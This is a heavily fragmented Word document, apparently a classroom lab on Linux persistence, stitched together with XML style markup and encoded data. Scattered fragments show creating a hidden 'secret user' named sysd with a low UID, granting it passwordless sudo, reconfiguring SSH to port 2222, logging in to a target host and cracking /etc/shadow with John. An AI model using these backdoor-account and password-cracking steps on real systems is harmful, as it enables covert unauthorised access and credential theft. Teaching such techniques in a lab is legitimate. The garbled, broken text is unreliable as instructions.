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Shadow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secret user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useradd --no-create-home -u 11 sysd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passwd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useradd --no-create-home -u 11 sysd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Groupmod -g 11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your secret user full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Sysd ALL=(ALL:ALL) NOPASSWD:ALL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-l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Smooth Sailing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sshd_config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67554" cy="3118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554" cy="311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Testing Your Configuration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the SSH service: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systemctl restart ssh.service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to the target machine using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sysd@192.168.6.105 -p 2222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switch to the root user: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su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Crack All the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back to the system using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ssh sysd@192.168.6.105 -p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Escalate your privileges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user. Use John to crack the entire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john /etc/shadow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7F03"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat w:val="1"/>
    <w:rsid w:val="00A27F0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27F0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A27F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A27F03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27F03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2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27F03"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="line" w:customStyle="1">
    <w:name w:val="line"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A27F0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+hDw3kCjGP+7e6m0dehegBF2VQ==">AMUW2mWfQCmRmGWqW5WxcPFHX/DHNri9hPVNf5esDo87PSUgekKgh/swT/ESPg2vQY4IIys0oDcqTils7/VmxMxhnn0MWz43H/0VxxS6ZjNMnobzQQZEdQQ=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2021-10-24T21:09:00Z</dcterms:created>
  <dc:creator>Lunn, William</dc:creator>
</cp:coreProperties>
</file>